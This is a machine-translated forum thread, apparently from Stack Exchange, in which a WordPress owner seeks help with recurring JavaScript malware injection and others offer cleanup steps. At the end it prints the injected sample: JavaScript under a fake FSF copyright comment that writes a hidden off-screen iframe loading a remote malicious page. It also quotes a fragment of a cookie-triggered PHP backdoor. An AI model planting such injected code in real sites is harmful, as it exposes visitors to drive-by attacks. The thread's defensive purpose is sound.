Wordpress恶意软件一次又一次

几天后，我的一个wordpress网站在谷歌警报下被重定向，因为一个恶意软件注入了一些js代码

我运行了几个恶意软件探测器，但我能找到的只是：

一些包含以下代码的php文件： 在我的js文件中注入了一些js代码，如下所示 我完全重新安装了wordpress和插件，重置了管理员密码，但无论如何，它还是回来了。我真的不知道该怎么办

---

因此，如果有人能提供一些提示，那就最好下载iTheme安全插件。有一个免费的恶意软件保护功能。这是一个很棒的插件

---

另外，检查页脚文件中是否有任何包含php编码行或未添加的iFrame的内容。

在找到循环孔之前，修复或假定其安全不再安全。按照以下步骤将其最小化

在php.ini中禁用eval函数，或联系支持人员为您执行此操作。 更新wordpress、主题和插件。 卸载未使用的主题和插件。 更改默认管理员用户名和密码。您可以直接更改数据库中的用户名。 如果有任何备份，请还原任何安全备份。然后执行上述所有步骤。

---

以下是我所做的：

备份的主题和数据库 更改的管理员密码不需要将管理员更改为其他用户名，因为它已经是另一个用户名 删除了除数据库之外的所有内容，因为我在转储中没有发现任何错误 更改ftp密码 重新安装了一个干净的wordpress GOTMLS安装了Sucuri和反恶意软件 安装了iTheme Security这一个很好，并按照说明进行了操作 重新安装主题，然后在2或3小时后进行分析 每2或3小时逐个重新安装干净的插件，并在每次间隔结束时进行分析

---

现在看起来很干净。

过去几周我一直在吃这个，这真是一场噩梦。 该恶意软件称为actermoto或homemader，它一次又一次地感染所有js文件

修复javascript文件没有意义，因为它们将在几分钟内重新感染

后门是系统中某个地方的php文件。 看起来有点像这样

if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['

您需要在服务器上执行grep以查找此文件

找到后门文件后，将其全部删除，并继续监视和更改js文件

---

这是一场消耗战，但坚持下去，你最终会得到所有的消耗。

我觉得安全性确实很棒！这个问题似乎离题了，因为它与编程无关，也许麻省理工学院适合这个问题

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Vuelingflytersku() {
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function Ursilifer(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
 var cookie = Ursilifer('karater7una8ue');
 if (cookie == undefined) {
  setCookie('karater7una8ue', true, 259201);
document.write('<iframe src="http://miriolda.onlyradiogreen.com.ar/aflorigunam16.khml"     style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');
}
}
Vuelingflytersku();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt

if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['